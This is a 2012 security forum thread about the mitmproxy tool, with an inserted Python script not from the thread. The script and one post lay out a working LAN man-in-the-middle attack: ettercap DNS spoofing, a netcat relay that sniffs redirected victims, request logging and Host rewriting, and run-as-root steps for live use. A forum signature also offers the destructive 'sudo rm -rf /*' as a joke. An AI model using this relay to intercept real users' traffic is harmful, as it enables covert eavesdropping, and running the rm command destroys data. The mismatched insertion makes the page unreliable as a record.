Topic: mitm proxy

weVeg

on: September 14, 2012, 07:03:26 PM
I know that we have another HTTP proxy, but take a look here:
http://mitmproxy.org/index.html

I've found it very cool!

A free voice is always liberating
under_r00t


ZEROF

Reply #1 on: September 14, 2012, 08:21:43 PM
Looks fine bro, I will try this tool.

INSTALL on BBox:

$ sudo apt-get install python-pip python-dev build-essential   # compiler and headers for the C extensions pip builds
$ sudo pip install --upgrade pip
$ sudo pip install --upgrade virtualenv
$ sudo pip install mitmproxy

Thanks !
« Last Edit: September 14, 2012, 09:45:38 PM by ZEROF »


Don't ask, read: http://wiki.backbox.org
or just run sudo rm -rf /*


weVeg

Reply #2 on: September 15, 2012, 12:13:23 AM
Yes, looks fine!! I'm playing with it and... it works very well!!! =)

see you bro!



joker__

Reply #3 on: September 17, 2012, 06:41:44 PM
Thank you for sharing, weVeg. These days I was searching for a proxy for performing a MITM... and I used a pretty simple "bash proxy" such as:
$ nc -l 80 | nc www.google.com 80    # one-way pipe: only client->server bytes are forwarded (OpenBSD nc syntax; traditional netcat wants -l -p 80)
Yeah, it worked fine... but I was still missing features such as on-the-fly editing... and SSL. I just didn't know of the existence of programs like this.... I'm here to learn ;)
Thank you

joker__

joker__
http://piecesofsheets.wordpress.com/ [soon in English]


weVeg

Reply #4 on: September 17, 2012, 07:00:28 PM
Hi joker! On bbox we already have this kind of tool, but I've found mitmproxy very useful as well as simple to use!!!
If you try it, some feedback would be useful!
Bye!!!!



joker__

Reply #5 on: September 18, 2012, 12:23:00 PM
Quote from weVeg: "Hi joker! On bbox we already have this kind of tool..."
Which tools, e.g.? :)

[Maybe OT, @ZEROF. If so, I may create a new topic for my question in the forum.]

Hi weVeg. I spent a bit of time on mitmproxy today. It is pretty intuitive, and very useful.
Actually I meant to perform an "elegant" DNS spoof. Maybe you can tell me how to do it using the application you suggested:

What I'm doing (working)
With ettercap I start a session using the dns_spoof plugin, spoofing e.g. www.google.it to a local IP (let's say the attacker is 192.168.1.5).
In this way anyone in the LAN who makes requests to google actually makes requests to my IP.
Now I start a simple proxy that replies to the connected client (victim) as google would:
$ mkfifo backpipe                                          # the fifo carries the server's replies back to the listening nc
# nc -l 80 0<backpipe | nc www.google.com 80 1>backpipe    # root prompt: port 80 is privileged; traditional netcat wants -l -p 80
Finally I can sniff all the data, through Wireshark or the like...

This attack works pretty well: the victim doesn't realize he's being attacked.

What I'd like to do
The fatal problem is: what about HTTPS?
I believed that a piece of software such as the one you suggested might do this job for me.
I actually tried, but I didn't manage to.
How would you do it? Let's say all the traffic to a server (google.com), as in my previous example, is being redirected to your PC. How do you make mitmproxy reply to all the client requests to google.com, also with HTTPS support?

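An added example, not code from the thread or from mitmproxy: the netcat relay from joker__'s two posts above (the one-line pipe in Reply #3 and the fifo version in Reply #5) rewritten in Python so that the first request on each victim connection is parsed, logged and has its Host header rewritten before being forwarded, which is the on-the-fly editing netcat cannot do. It assumes the DNS spoof already steers victims to the machine running it. The names rewrite_request, handle_client, serve, fake_origin and fetch_via are this example's own; fake_origin is a constructed stand-in for the real server (www.google.com) on loopback so the script runs offline. It is deliberately plaintext-only: a TLS client opens with a ClientHello and expects a certificate valid for the spoofed name, which a byte relay cannot produce. That is the HTTPS problem the post raises, and it is what mitmproxy's generated CA addresses, which only works on clients that have been made to trust that CA.

```python
"""Added example: the thread's two-nc-and-a-fifo relay in Python, plus what netcat lacks (parse, log, rewrite Host)."""
import logging
import socket
import threading
from typing import Optional, Tuple

def rewrite_request(raw: bytes, new_host: Optional[str]) -> Tuple[bytes, str]:
    """Return (bytes to forward, request line). With new_host set, Host is replaced (appended if absent);
    the body passes through. Non-HTTP data (e.g. a TLS ClientHello) comes back unchanged, request line ""."""
    sep = raw.find(b"\r\n\r\n")
    if sep == -1 or not raw[:sep].isascii():
        return raw, ""
    lines = raw[:sep].split(b"\r\n")
    request_line = lines[0].decode("ascii")
    if new_host is None:
        return raw, request_line
    head, seen = [lines[0]], False
    for line in lines[1:]:
        if line.lower().startswith(b"host:"):
            line, seen = b"Host: " + new_host.encode("ascii"), True
        head.append(line)
    if not seen:
        head.append(b"Host: " + new_host.encode("ascii"))
    return b"\r\n".join(head) + raw[sep:], request_line

def _pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the EOF propagates."""
    try:
        for data in iter(lambda: src.recv(65536), b""):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def handle_client(client, upstream, host_header=None):
    """Relay one victim connection to the real server (upstream), editing its first request."""
    with client:
        peer = client.getpeername()[0]
        first = client.recv(65536)
        if not first:
            return
        if first[:1] == b"\x16":
            # TLS handshake record: the client wants a cert for the spoofed name, which we cannot present,
            # so we relay blind. Filling this gap is what mitmproxy's generated CA is for, if the victim trusts it.
            logging.warning("%s: TLS ClientHello, relaying without inspection", peer)
        first, request_line = rewrite_request(first, host_header)
        logging.info("%s -> %s:%d  %s", peer, *upstream, request_line or "(non-HTTP)")
        with socket.create_connection(upstream, timeout=10) as server:
            server.sendall(first)
            # One pump per direction is the full-duplex relay the fifo gave the two nc's.
            # Only the first request of a keep-alive connection gets edited.
            threading.Thread(target=_pump, args=(client, server), daemon=True).start()
            _pump(server, client)
            try:
                client.shutdown(socket.SHUT_RDWR)  # wake the other pump's recv
            except OSError:
                pass

def serve(addr, handler):
    """Bind addr, run handler(conn) for each connection in the background; return (socket, bound port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(addr)
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return  # listener closed
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]

def fake_origin(conn):
    """Constructed stand-in for the real server: answers with the Host header it received."""
    with conn:
        req = conn.recv(65536)
        host = next((l[5:].strip() for l in req.split(b"\r\n") if l.lower().startswith(b"host:")), b"?")
        body = b"origin saw Host: " + host
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\nConnection: close\r\n\r\n" % len(body) + body)

def fetch_via(relay_port, host_header):
    """Play the victim: plain HTTP to the relay, with the spoofed name in Host."""
    with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as s:
        s.sendall(f"GET / HTTP/1.1\r\nHost: {host_header}\r\nConnection: close\r\n\r\n".encode())
        return b"".join(iter(lambda: s.recv(65536), b""))

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(levelname)s %(message)s")
    _o, oport = serve(("127.0.0.1", 0), fake_origin)  # plays www.google.com on loopback
    _r, rport = serve(("127.0.0.1", 0), lambda c: handle_client(c, ("127.0.0.1", oport), "www.google.com"))
    print(fetch_via(rport, "www.google.it").decode())
```

Run as-is it does the loopback round trip: the victim asks for Host: www.google.it, the relay logs the request line and the origin reports that it received Host: www.google.com. In the LAN scenario from the post you would instead run, as root, serve(("0.0.0.0", 80), lambda c: handle_client(c, ("www.google.com", 80))) after ettercap has pointed the victims at this box; the TLS branch then shows exactly where a plain relay stops and a certificate-forging proxy like mitmproxy has to take over.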


weVeg

Reply #6 on: September 18, 2012, 01:28:31 PM
@joker: sorry, I made a mistake with zap... I'm confused!
Well, I'm a new mitmproxy user too, so I refer you to the doc page [1]


[1] http://mitmproxy.org/doc/index.html



joker__

Reply #7 on: September 19, 2012, 11:43:32 AM

Yep, ZAP is for finding vulns in web applications ;)
OK, so we'll learn by ourselves how to use this tool... it seems cool :)

Bye!



weVeg

Reply #8 on: September 19, 2012, 01:36:49 PM
Eh, yes! Sometimes I make mistakes with installed or default tools.... a bit of delirium!
